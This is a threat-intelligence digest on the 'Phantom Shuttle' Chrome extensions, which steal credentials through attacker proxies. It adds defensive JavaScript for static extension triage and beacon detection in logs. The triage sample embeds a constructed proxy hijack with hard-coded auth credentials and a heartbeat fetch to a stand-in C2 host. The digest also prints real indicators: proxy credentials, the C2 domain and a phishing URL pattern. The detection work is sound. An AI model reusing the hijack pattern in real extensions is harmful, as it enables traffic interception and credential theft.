Phantom Shuttle Chrome Extensions Steal User Credentials
Summary
Two malicious Chrome extensions named 'Phantom Shuttle' have been discovered in the Chrome Web Store, targeting users in China, particularly foreign trade workers. The older of the two has been listed since 2017. Promoted as proxy and network speed testing tools, the extensions hijack user traffic by routing it through attacker-controlled proxies and carry covert data-theft functionality: they intercept HTTP authentication challenges, capture form data, steal session cookies, and extract API tokens. Traffic for over 170 targeted domains is routed through the C2 infrastructure, exposing a wide range of sensitive information. The operation is likely China-based, and both extensions remained available in the Chrome Web Store at the time of reporting.
Timeline
- 23.12.2025 15:31 (2 articles)
Phantom Shuttle Extensions Discovered in Chrome Web Store
Two malicious Chrome extensions named 'Phantom Shuttle' are reported in the Chrome Web Store, targeting users in China. Marketed as proxy and network speed testing tools, they route traffic for over 170 targeted domains through attacker-controlled proxies and exfiltrate credentials, session cookies, form data and API tokens to C2 infrastructure. The operation is likely China-based, and the extensions were still listed at the time of reporting.
Sources:
- Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
- Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
Information Snippets
- The extensions are named 'Phantom Shuttle' and are available in the Chrome Web Store.
  First reported: 23.12.2025 15:31 (2 sources, 2 articles)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions have been active since at least 2017 and are targeted at users in China.
  First reported: 23.12.2025 15:31 (2 sources, 2 articles)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions route user traffic through attacker-controlled proxies using hardcoded credentials.
  First reported: 23.12.2025 15:31 (2 sources, 2 articles)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The malicious code is prepended to the legitimate jQuery library and uses a custom character-index encoding scheme to hide credentials.
  First reported: 23.12.2025 15:31 (1 source, 1 article)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
- The extensions intercept HTTP authentication challenges and capture form data, session cookies, and API tokens.
  First reported: 23.12.2025 15:31 (2 sources, 2 articles)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
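The hijack chain in the snippets above (proxy routing with hard-coded credentials, code hidden next to jQuery with an index-encoded credential string, an authentication handler that answers the proxy's challenge, a periodic check-in) leaves static fingerprints in an unpacked extension. Once traffic is routed this way the proxy is the interception point: plaintext HTTP headers and bodies are fully visible to it, and for HTTPS it sees at least every CONNECT target hostname. The following is an added example, not code from the reports or from the extensions themselves. It shows the generic shape of a character-index decoder (the actual alphabet and layout used by the extensions are not published here) and a triage pass over a constructed manifest and background script; proxy.example.invalid, c2.example.invalid, the sample alphabet and the sample credentials are placeholders.

```javascript
// Static triage of an unpacked Chrome extension for the traffic-hijacking
// pattern: "proxy" permission plus a PAC script deciding which hosts go to the
// proxy, an onAuthRequired handler answering the proxy's auth challenge with
// baked-in credentials, a fixed beacon interval, and integer arrays that may
// be character-index-encoded strings. Added example; sample data is constructed.

const RISKY_PERMISSIONS = ['proxy', 'webRequest', 'webRequestBlocking', 'webRequestAuthProvider'];

// Generic form of a character-index encoding: each integer selects one
// character of a lookup alphabet. Assumed shape, not the extensions' real scheme.
function decodeIndexArray(indexes, alphabet) {
  return indexes.map((i) => {
    if (!Number.isInteger(i) || i < 0 || i >= alphabet.length) {
      throw new RangeError(`index ${i} outside alphabet of length ${alphabet.length}`);
    }
    return alphabet[i];
  }).join('');
}

function isBroadHost(pattern) {
  return pattern === '<all_urls>' || /^\*:\/\/\*\//.test(pattern);
}

// manifest: parsed manifest.json; scripts: { filename: source text }
function triageExtension(manifest, scripts) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  for (const p of perms) if (RISKY_PERMISSIONS.includes(p)) findings.push(`permission:${p}`);
  // MV3 lists hosts under host_permissions; MV2 mixes them into permissions
  if ([...perms, ...(manifest.host_permissions || [])].some(isBroadHost)) findings.push('host_permissions:broad');

  for (const [name, src] of Object.entries(scripts)) {
    if (/chrome\.proxy\.settings\.set\s*\(/.test(src)) findings.push(`${name}:proxy.settings.set`);
    if (/\bpacScript\b/.test(src)) findings.push(`${name}:pac_script`);
    if (/onAuthRequired\.addListener/.test(src)) findings.push(`${name}:onAuthRequired_listener`);
    // credentials object with string literals next to the auth handler
    const auth = src.match(/onAuthRequired[\s\S]{0,400}?authCredentials\s*:\s*\{[^}]*\}/);
    if (auth && /\b(?:username|password)\s*:\s*['"][^'"]+['"]/.test(auth[0])) {
      findings.push(`${name}:hardcoded_auth_credentials`);
    }
    // timers firing every 30 s to 5 min are typical check-in intervals
    for (const m of src.matchAll(/setInterval\s*\([\s\S]*?,\s*(\d+)\s*\)/g)) {
      const ms = Number(m[1]);
      if (ms >= 30000 && ms <= 300000) findings.push(`${name}:beacon_interval_${ms}ms`);
    }
    // eight or more small integers in one array literal: candidate encoded string
    for (const m of src.matchAll(/\[\s*(?:\d{1,3}\s*,\s*){7,}\d{1,3}\s*\]/g)) {
      findings.push(`${name}:int_array_len${m[0].split(',').length}`);
    }
  }
  return findings;
}

// Constructed sample resembling the pattern (placeholder hosts and credentials).
const SAMPLE_ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789.:-';
const SAMPLE_INDEXES = [15, 17, 14, 23, 24, 20, 18, 4, 17, 37, 15, 17, 14, 23, 24, 15, 0, 18, 18];
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Multi-location speed test',
  version: '1.0',
  permissions: ['proxy', 'webRequest', 'webRequestAuthProvider', 'storage'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'background.js' },
};
const SAMPLE_SCRIPTS = {
  'background.js': `
const A = '${SAMPLE_ALPHABET}';
const C = [${SAMPLE_INDEXES.join(',')}];
const [user, pass] = C.map(i => A[i]).join('').split(':');
chrome.proxy.settings.set({
  value: { mode: 'pac_script', pacScript: { data:
    'function FindProxyForURL(url, host) { if (dnsDomainIs(host, ".example.invalid")) return "PROXY proxy.example.invalid:3128"; return "DIRECT"; }' } },
  scope: 'regular',
});
chrome.webRequest.onAuthRequired.addListener(
  () => ({ authCredentials: { username: 'proxyuser', password: pass } }),
  { urls: ['<all_urls>'] }, ['blocking']);
setInterval(() => fetch('https://c2.example.invalid/heartbeat'), 60000);
`,
};

function triageSample() {
  return triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS);
}

console.log(decodeIndexArray(SAMPLE_INDEXES, SAMPLE_ALPHABET));
console.log(triageSample());
```

The checks are heuristics, not signatures: a legitimate VPN extension will also request "proxy" and answer onAuthRequired, so the useful signal is the combination with broad host permissions, literal credentials, a fixed timer and encoded strings. Run it over every script the manifest references, including bundled libraries, since the report describes the payload prepended to jQuery rather than in a separate file.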
- The extensions are promoted as proxy and network speed testing tools, with subscriptions priced between ¥9.9 and ¥95.9 CNY (roughly $1.40 to $13.60 USD).
  First reported: 23.12.2025 15:31 (2 sources, 2 articles)
  - Malicious extensions in Chrome Web store steal user credentials — www.bleepingcomputer.com — 23.12.2025 15:31
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions are advertised as a 'multi-location network speed test plug-in' for developers and foreign trade personnel.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The two extensions have about 2,000 and 180 users respectively and were published on November 26, 2017 and April 27, 2023.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- Users pay subscriptions of ¥9.9 to ¥95.9 CNY (roughly $1.40 to $13.60 USD) for a purported VPN service.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions authenticate to the attacker-controlled proxy with hard-coded proxy credentials (topfany / 963852wei), so all routed traffic passes through infrastructure the operator controls and can be intercepted there.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions route traffic from over 170 targeted domains through the C2 infrastructure.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions capture passwords, credit card numbers, authentication cookies, browsing history, form data, API keys, and access tokens.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The operation is likely China-based, indicated by the Chinese-language interface and marketing, Alipay/WeChat Pay payment options, and Alibaba Cloud infrastructure.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
- The extensions maintain a 60-second heartbeat to the C2 server at phantomshuttle[.]space, exfiltrating user credentials and metadata.
  First reported: 23.12.2025 16:42 (1 source, 1 article)
  - Two Chrome Extensions Caught Secretly Stealing Credentials from Over 170 Sites — thehackernews.com — 23.12.2025 16:42
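A fixed 60-second check-in like the one described above is often easier to spot in egress or proxy logs than in the extension code, because the period survives whatever obfuscation the client uses. The following is an added example, not from the reports: it groups constructed proxy log lines by client and destination host and flags pairs whose inter-request intervals are tightly periodic. The log format ("timestamp client method host") and the host c2.example.invalid are placeholders; in a real hunt the reported domain, or any host, would be matched the same way.

```javascript
// Beacon detection over proxy/egress logs: for each (client, host) pair compute
// inter-request intervals and flag pairs whose median interval is stable
// (median absolute deviation small relative to the period). Added example;
// the log lines below are constructed and the hosts are placeholders.

// Constructed log: "ISO-8601 time  client-ip  method  host"
const SAMPLE_LOG = [
  '2025-12-23T10:00:00Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:00:05Z 10.0.0.5 GET www.example.com',
  '2025-12-23T10:00:17Z 10.0.0.5 GET www.example.com',
  '2025-12-23T10:01:00Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:02:01Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:03:00Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:03:20Z 10.0.0.5 GET www.example.com',
  '2025-12-23T10:03:50Z 10.0.0.5 GET www.example.com',
  '2025-12-23T10:04:00Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:04:07Z 10.0.0.9 CONNECT c2.example.invalid',
  '2025-12-23T10:05:01Z 10.0.0.5 CONNECT c2.example.invalid',
  '2025-12-23T10:05:40Z 10.0.0.5 GET www.example.com',
  '2025-12-23T10:06:30Z 10.0.0.9 CONNECT c2.example.invalid',
];

function parseLine(line) {
  const [ts, client, method, host] = line.trim().split(/\s+/);
  const t = Date.parse(ts);
  if (Number.isNaN(t)) throw new Error(`bad timestamp in: ${line}`);
  return { t: t / 1000, client, method, host };
}

function median(xs) {
  const s = [...xs].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// minHits: requests needed before judging; maxJitter: MAD/period ceiling;
// minPeriod: ignore sub-10 s bursts such as page loads with many subresources.
function findBeacons(lines, { minHits = 5, maxJitter = 0.1, minPeriod = 10 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    const key = `${e.client} ${e.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e.t);
  }
  const out = [];
  for (const [key, times] of groups) {
    if (times.length < minHits) continue;
    times.sort((a, b) => a - b);
    const deltas = times.slice(1).map((t, i) => t - times[i]);
    const period = median(deltas);
    const mad = median(deltas.map((d) => Math.abs(d - period)));
    if (period >= minPeriod && mad / period <= maxJitter) {
      const [client, host] = key.split(' ');
      out.push({ client, host, hits: times.length, periodSeconds: Math.round(period), jitter: +(mad / period).toFixed(3) });
    }
  }
  return out;
}

console.log(findBeacons(SAMPLE_LOG));
```

Only the 10.0.0.5 to c2.example.invalid pair is reported: six hits at 59 to 61 second spacing, while the browsing to www.example.com is irregular and 10.0.0.9 has too few hits to judge. Real implants often add deliberate jitter, so maxJitter is a tunable, and the analysis should cover at least an hour of logs per client so that a fixed period stands out from coincidence.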
Similar Happenings
GhostPoster Campaign Uses Steganography in Firefox Addon Logos
A campaign named GhostPoster has been discovered, which hides malicious JavaScript code in the PNG logos of Firefox extensions. These extensions, with over 50,000 downloads, monitor browser activity and plant a backdoor. The hidden script acts as a loader that fetches the main payload from a remote server, retrieving it only 10% of the time to evade detection. The campaign involves 17 compromised extensions, primarily from popular categories like VPNs, weather, and translation tools. The payload can hijack affiliate links, inject tracking code, and commit click and ad fraud. Users are advised to remove these extensions and reset passwords for critical accounts.
Urban VPN Proxy Chrome Extension Harvests AI Chat Data from Millions
The Urban VPN Proxy Chrome extension, featured on the Google Chrome Web Store with over six million users, has been found to silently intercept and collect AI chatbot conversations, including prompts and responses, from platforms like ChatGPT, Claude, and Gemini. The extension, updated in July 2025, uses hard-coded settings to enable this data harvesting by default, routing conversation data to remote servers for analysis and monetization. The extension's developer, Urban Cyber Security Inc., shares this data with an affiliated company, BIScience, which uses it for advertising and brand monitoring purposes. The extension also carries a 'Featured' badge, implying endorsement by Google and Microsoft, despite the privacy concerns. Researchers from Koi discovered that the extension injects code into supported AI websites and overrides standard browser network functions to capture conversations. This functionality was introduced in version 5.5.0 of the extension, released on July 9, 2025, and affects over eight million users across Chrome and Edge.
ShadyPanda Browser Extensions Campaign Exploits 4.3M Installs
The ShadyPanda campaign has amassed over 4.3 million installations of malicious Chrome and Edge browser extensions, evolving from legitimate tools into spyware over multiple phases. The extensions, discovered by Koi Security, engaged in affiliate fraud, search hijacking, and remote code execution. The campaign remains active on the Microsoft Edge Add-ons platform, with one extension having 3 million installs. The extensions collect browsing history, search queries, keystrokes, mouse clicks, and other sensitive data, exfiltrating it to domains in China. Users are advised to remove these extensions and reset their account passwords. The ShadyPanda campaign used a supply-chain attack tactic by publishing or acquiring harmless extensions, letting them run clean for years to build trust and gain millions of installs, then suddenly flipping them into malware via silent updates. The compromised extensions became a fully fledged remote code execution (RCE) framework inside the browser, capable of downloading and running arbitrary JavaScript with full access to the browser's data and capabilities. The extensions could steal session cookies and tokens, allowing them to impersonate entire SaaS accounts such as Microsoft 365 or Google Workspace. The risk of malicious browser extensions extends beyond individual users, as they can access cookies, local storage, cloud auth sessions, active web content, and file downloads, blurring the line between endpoint security and cloud security. Organizations should enforce extension allow lists, treat extension access like OAuth access, audit extension permissions regularly, and monitor for suspicious extension behavior to reduce the risk of malicious extensions. Modern SaaS security platforms, such as Reco's Dynamic SaaS Security platform, can help organizations monitor and detect suspicious activity related to browser extensions in real time.
Sturnus Android Malware Targets Encrypted Messaging Apps and Banking Credentials
Sturnus, a new Android banking trojan, steals messages from encrypted apps like Signal, WhatsApp, and Telegram by capturing screen content post-decryption. It performs full device takeover via VNC and overlays to steal banking credentials. The malware is under development but fully functional, targeting European financial institutions with region-specific overlays. It uses a mix of encryption methods for C2 communication and abuses Accessibility services for extensive control. The malware is disguised as legitimate apps like Google Chrome or Preemix Box, but distribution methods remain unknown. It establishes encrypted channels for commands and data exfiltration, and gains Device Administrator privileges to prevent removal. ThreatFabric reports low-volume attacks in Southern and Central Europe, suggesting testing for larger campaigns. New details reveal Sturnus uses WebSocket and HTTP channels for communication, displays full-screen overlays mimicking OS updates, and collects extensive device data for continuous feedback.
VoidProxy phishing service targets Microsoft 365, Google accounts
A new phishing-as-a-service (PhaaS) platform, VoidProxy, targets Microsoft 365 and Google accounts, including those protected by third-party single sign-on (SSO) providers like Okta. The platform uses adversary-in-the-middle (AitM) tactics to steal credentials, multi-factor authentication (MFA) codes, and session cookies in real time. The attack begins with emails from compromised accounts at email service providers, which include shortened links redirecting recipients to phishing sites. The phishing sites are hosted on disposable low-cost domains and protected by Cloudflare to hide their real IPs. Additionally, a new phishing automation platform named Quantum Route Redirect (QRR) is targeting Microsoft 365 users worldwide. QRR uses around 1,000 domains hosted on parked or compromised domains to steal credentials. The attacks start with malicious emails impersonating various services, redirecting users to credential harvesting pages. QRR employs a built-in filtering mechanism to distinguish between bots and human visitors, redirecting humans to phishing pages while sending bots to benign sites. QRR has been observed targeting Microsoft 365 accounts across 90 countries, with 76% of attacks directed at U.S. users. The platform offers advanced features such as a configuration panel, monitoring dashboards, intelligent traffic routing, and an analytics dashboard, making it easier for less technically minded cybercriminals to launch sophisticated phishing campaigns. QRR has been observed in the wild since August 2025 and uses a URL pattern of "/([\w\d-]+\.){2}[\w]{,3}\/quantum.php/" for its phishing campaigns. QRR can bypass Microsoft 365 email protections, including Microsoft Exchange Online Protection (EOP), secure email gateways (SEG), and integrated cloud email security (ICES) products. QRR's intelligent redirect system can differentiate between security tools and human visitors, redirecting security tools to legitimate websites and human visitors to phishing pages. QRR has also been observed deceiving web application firewall products, enabling attacks to bypass multiple layers of security.